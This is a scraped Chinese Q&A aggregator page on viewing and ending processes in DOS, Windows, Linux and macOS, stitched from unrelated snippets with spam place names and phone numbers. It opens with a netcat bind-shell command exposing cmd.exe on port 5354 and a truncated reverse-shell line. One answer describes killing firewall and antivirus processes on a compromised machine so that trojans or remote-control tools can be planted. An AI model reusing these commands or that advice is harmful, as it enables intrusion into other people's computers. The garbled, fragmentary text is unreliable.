nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 @4G-\W=~
nc -t -e c:winntsystem32cmd.exe 192.16

查看进程:键入taskmgr 再回车就可以了。

停止进程:键入KILL+进程名 再回车就OK了。

我空间里有关于dos命令的格式和参数有时间的话自己去看看吧!dos命令有点多不想在这里写了!


Linux\/Unix平台如何查看OS上存在有哪些数据库或实例
Linux\/Unix平台如何查看OS上存在有哪些数据库或实例 其实这是一个不难的问题,由于有同事问到这个问题,我就把这个问题的方法写下来好了,必竟有一个人来问,说不定还有第二个人不会,希望对还不会的或是刚入行的朋友有所帮助吧。linux\/unix平台如何查看OS上存在多少个数据库,查询方法主要有三种,...

linux下用ps -ef |grep ,结果哪个是进程号
root 13091 12287 0 07:20 pts\/1 00:00:00 grep oscard中的第二列【13091】是进程号。ps命令将某个进程显示出来,LINUX下最常用的也是非常强大的进程查看命令 grep命令是查找,全称是Global Regular Expression Print,表示全局正则表达式版本,它的使用权限是所有用户。这是一种强大的文本搜索工具,它...

如何查看Linux下进程的IO活动状况 00 Hey,Linux
最后,找到了两个方法可以查看进程IO的活动状况。1. 第一个方法是通过一个python脚本来实现。方法是将以下内容另存为一个叫io.py的脚本中,然后直接以root身份执行脚本,就可以看到如下图所示的信息(由于我们已经通过升级到SSD硬盘解决了MySQL的IO问题,所以不能提供关于MySQL的截图了),其中出现次数最...

Linux守护进程详解
如果想让程序即使在关闭当前的终端后也始终在后台执行(之前的&做不到),需要使用nohup命令。 nohup命令可以在你退出帐户\/关闭终端之后继续运行相应的进程。 关闭终端后,在另一个终端jobs已经无法看到后台跑的程序了,此时利用ps(进程查看命令)查看进程。http:\/\/m.2cto.com\/os\/201301\/185701....

怎么检查公司的电脑是否安装了加密软件?
2. 检查加密软件界面:如果公司电脑安装了第三方加密软件,通常会在桌面或开始菜单中显示相应的软件图标。尝试打开这些软件,看看是否可以查看到与加密相关的设置和信息。3. 检查运行中的加密进程:在Windows系统下,可以按下Ctrl+Shift+Esc打开任务管理器,查看运行中的进程。如果发现与加密相关的进程(例如...

苹果电脑进程怎么关闭
点选你要退出的进程名称或进程 ID,然后点退出(kill),失去响应的应用通常会显示成红色,然后点按红色的“退出进程”按钮。这基本上等于 Windows 系统中的“任务管理器”,或者可以看成之前的“强制退出应用”窗口的完整版。如果前边的方式都无效,这种方法大部分情况下是能够凑效的。3、从苹果菜单中...

Mac OS 的 kernel_task 进程占用 cpu 超高的问题为什么翻遍网络都没...
kernel task mac居高怎么查找原因 :kernel_task 是内核任务进程?”-“关于本机”-“更多信息”-“系统报告”的“硬件概览”中的第二行——型号标识符并牢记2)在Finder中进入路,只要开机,此进程必然运行。 解决办法: 1)查看“,提供系统底层的服务支持kernel task特别占内存的原因是”如何关闭...

os通过什么来感知进程的存在
PCB感知。os通过PCB感知来感知进程的存在。PCB是进程存在的唯一标志。

Android OS 耗电是什么情况
若使用的是vivo手机,Android系统是多个功能和服务的集合体,比如权限管理、蓝牙设置、电话服务、指纹与密码等常用功能有关的耗电会被计入Android系统,如果第三方软件使用到这些功能,电量也会被计入Android系统,所以我们看到Android系统程序耗电较高,实际和第三方软件的使用情况有关,您可以使用“一键加速”...

电脑进程数太多怎么办
问题一:进程数太多怎么办 楼主,你好! 首先你要区分哪些是系统进程,哪些是用户进程。 系统进程是不能够结束的,用户进程是可以强行结束的。 楼主在开始菜单_运行_输入“msconfig” 查询下当前电脑启动的时候,会启动哪些进程。 把不必要的用户进程,不进行 勾选就可以了。 这样的话,还可以加快电脑的启动速度。

镇沅彝族哈尼族拉祜族自治县18435362491: 如何使用DOS命令查看电脑进程信息 -
舌黄正心: 们运用DOS命令查看进程信息.首先我们打开电脑左下角菜单栏目,输入CMD在菜单运行栏目里面输入CMD命令后,会显示命令行信息我们就让DOS窗口.我们利用命令行WMIC命令来开启查看系统进程的权限,进行查看当前运行的进程.接着我们在DOS窗口可以看到此时会弹出一个wmic:root\cli>命令,我们在命令行wmic:root\cli>后面输入Process命令来开启查看当前系统进程情况.如果我们当前的进程比较多一页看不完,我们还可以点进右方的滚动条,进行下拉查看更多进程信息.我们也可以使用任务管理器来查看但是查看的列表进程没有用命令行详细,所有我们最好时候命令行来查看.

镇沅彝族哈尼族拉祜族自治县18435362491: 怎么样用DOS命令查看进程?
舌黄正心: 查看进程:tasklist 结束进入:1.taskkill /PID PID号 /f /t 2.ntsd -c -p q PID号 PID号是一个数值,可变的.使用tasklist查看进程,后面会有一个数值,那个值就是PID号 PID号,就是进程运行的一个编号

镇沅彝族哈尼族拉祜族自治县18435362491: 怎样在DOS下上网 或是查看进程?
舌黄正心: 查看进程:键入taskmgr 再回车就可以了. 停止进程:键入KILL+进程名 再回车就OK了.

镇沅彝族哈尼族拉祜族自治县18435362491: 如何用DOS命令查看进程 -
舌黄正心: 补充一点,taskkill 后面加进程的pid 号,就可以删除这个进程

镇沅彝族哈尼族拉祜族自治县18435362491: 怎么才能在DOS查看进程以及占用资源量
舌黄正心: cmd下两个非常重要的命令,往往我们在得到对方的dosshell以后,想给对方传送木 马或者rdmin等远程控制软件,但是对方开了win自带的防火墙,或者是天网,更或者 是瑞星的实时监控(其中以瑞星的最麻烦,因为都是有关联服务的),这时我们可以 用"tsd -c q -p PID",PID的获得方法有vbs脚本,也可以使用tasklist..现在先说下 tasklist...(cmd下执行tasklist就可以获得进程的详细资料,

镇沅彝族哈尼族拉祜族自治县18435362491: 如何在DOS状态下查看任务管理器中的进程标识符(PID)? -
舌黄正心: tasklist 命令

镇沅彝族哈尼族拉祜族自治县18435362491: 我要如何才可看到我机器的进程呀???
舌黄正心: ctrl alt del一起按,任务管理器或者任务栏右键,任务管理器里面有进程一项 我建议你可以用WINDOS优化大师来管理 这样你会省去很多的麻烦 那里面就有一个专门的进程管理

镇沅彝族哈尼族拉祜族自治县18435362491: 有没有打开任务管理器中显示的进程的dos命令 -
舌黄正心: 在dos窗口输入taskmgr,能打开任务管理器.你试试~

镇沅彝族哈尼族拉祜族自治县18435362491: 跪求.查看隐藏的进程的DOS命令 -
舌黄正心: 请问你是什么操作系统? 在任务管理器里面就可以结束进程呀.你可以选择结束进程树,这样就把和这个进程有关的父进程和子进程全结束的呀,哪里要进什么DOS. 不过这样的进程应该是自动启动的,你就算结束了,重起后它又会自己启动. 你必须阻止它自动启动.方法有很多, 比较简单的就是有金山清理专家来禁止它自动启动.金山清理专家免费试用的.www.kingsoft.com

镇沅彝族哈尼族拉祜族自治县18435362491: 怎么用dos察看任务管理器?
舌黄正心: 点“开始”-“运行”,输入命令taskmgr或者是taskmgr.exe

本站内容来自于网友发表,不代表本站立场,仅表示其个人看法,不对其真实性、正确性、有效性作任何的担保
相关事宜请发邮件给我们
© 星空见康网